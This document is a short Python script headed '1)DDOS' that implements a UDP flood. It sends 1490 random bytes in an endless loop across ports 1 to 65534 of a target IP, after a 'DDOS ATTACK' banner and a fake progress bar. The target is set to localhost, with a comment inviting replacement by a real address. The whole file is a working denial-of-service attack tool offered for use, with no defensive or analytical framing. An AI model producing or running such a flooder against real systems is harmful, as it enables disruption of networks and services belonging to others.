1)DDOS

import sys
import os
import time
import socket
import random
from datetime import datetime  # For timestamp

# ---------------- Time Details ----------------
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year

# ---------------- Socket Setup ----------------
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # Create UDP socket
bytes = random._urandom(1490)  # Generate random bytes to send as payload

# ---------------- UI and Setup ----------------
os.system("clear")  # Clear terminal (Linux/macOS), use 'cls' for Windows

print("\n----------------------------------------------------")
print("\n--------- D D O S   A T T A C K ---------")
print("\n----------------------------------------------------\n")

# Target IP and Port (replace with actual IP/port if needed)
ip = '127.0.0.1'
port = 1024

print("\nThe IP address of the Host to Attack is : ", ip)
print("\nThe PORT address of the Host to Attack is : ", port)
print("\n----------------------------------------------------\n")

# Simulated loading bar
print("[ ] 0% ")
time.sleep(2)
print("[===== ] 25%")
time.sleep(2)
print("[========== ] 50%")
time.sleep(2)
print("[=============== ] 75%")
time.sleep(2)
print("[====================] 100%")
time.sleep(2)

print("\n----------------------------------------------------\n")

# ---------------- Attack Loop ----------------
sent = 0
while True:
    sock.sendto(bytes, (ip, port))  # Send packet to target IP and port
    sent += 1
    port += 1
    print("Sent %s packet to %s through port: %s" % (sent, ip, port))

    # Restart port if it exceeds max UDP port range
    if port == 65534:
        port = 1
